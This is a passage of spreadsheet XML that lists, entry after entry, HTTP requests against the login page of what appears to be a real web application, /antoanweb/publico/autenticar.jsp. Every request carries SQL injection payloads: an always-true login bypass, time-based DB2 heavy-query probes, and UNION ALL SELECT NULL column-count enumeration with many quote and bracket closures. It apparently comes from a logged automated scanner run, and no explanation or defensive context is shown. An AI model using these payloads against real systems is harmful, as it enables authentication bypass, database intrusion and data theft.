    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6857')))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((('dgzu'='dgzu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9667&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1976'or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and'fzko'='fzko&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9630&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3711')or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and('rdmk'like'rdmk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9325&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-238'))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(('smfw'like'smfw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1091&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6700')))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((('dfcy'like'dfcy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6381&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1851'or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and'huzm'like'huzm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6437&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1939")or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and("apxv"="apxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3921&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3946"))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(("bkeq"="bkeq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3918&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2439")))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((("vntp"="vntp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3188"or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and"bysq"="bysq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-299&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7015")or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and("uvia"like"uvia&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2750&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6881"))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(("psaq"like"psaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2095&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8900")))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((("gfkq"like"gfkq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3663&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4550"or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and"dyal"like"dyal&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull#and(9347=9347&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null#and(412=412&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null#and(5477=5477&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null#and(967=967&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null#and(1276=1276&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null#and(7019=7019&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null#and(8499=8499&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null#and(1234=1234&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null#and(2512=2512&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null#and(3895=3895&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull#and((3895=3895&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null#and((9711=9711&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null#and((6756=6756&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null#and((8179=8179&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null#and((7009=7009&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null#and((289=289&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null#and((6236=6236&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null#and((6067=6067&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null#and((3092=3092&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null#and((1204=1204&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull#and(((595=595&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null#and(((7496=7496&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null#and(((3716=3716&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null#and(((9723=9723&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null#and(((5861=5861&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null#and(((4521=4521&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null#and(((3590=3590&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null#and(((5643=5643&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null#and(((1618=1618&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null#and(((6951=6951&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null,null#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull#and('egge'='egge&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null#and('ohhr'='ohhr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null#and('jyex'='jyex&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null#and('tezv'='tezv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null#and('gude'='gude&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null#and('octp'='octp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null#and('mfwm'='mfwm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null#and('yxye'='yxye&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null#and('cnrh'='cnrh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null#and('abal'='abal&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull#and(('tmbi'='tmbi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null#and(('yxog'='yxog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null#and(('vgyt'='vgyt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null#and(('glql'='glql&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null#and(('umit'='umit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null#and(('vjkr'='vjkr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null#and(('fuid'='fuid&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null#and(('gjzz'='gjzz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null#and(('fidq'='fidq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null#and(('vsvo'='vsvo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull#and((('bmcz'='bmcz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null#and((('twao'='twao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null#and((('elhi'='elhi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null#and((('dnnv'='dnnv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null#and((('bpko'='bpko&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null#and((('ofar'='ofar&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null#and((('okrd'='okrd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null#and((('lupd'='lupd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null#and((('aswm'='aswm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null#and((('fjsl'='fjsl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull#and'honj'='honj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null#and'rsct'='rsct&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null#and'enmn'='enmn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null#and'ioje'='ioje&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null#and'hetq'='hetq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null#and'xgdz'='xgdz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null#and'nzqy'='nzqy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null#and'vtfd'='vtfd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null#and'ycyg'='ycyg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null#and'wrrk'='wrrk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull#and('htep'like'htep&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null#and('xcdi'like'xcdi&amp;modo=entrar</t>
  </si>
  <si>
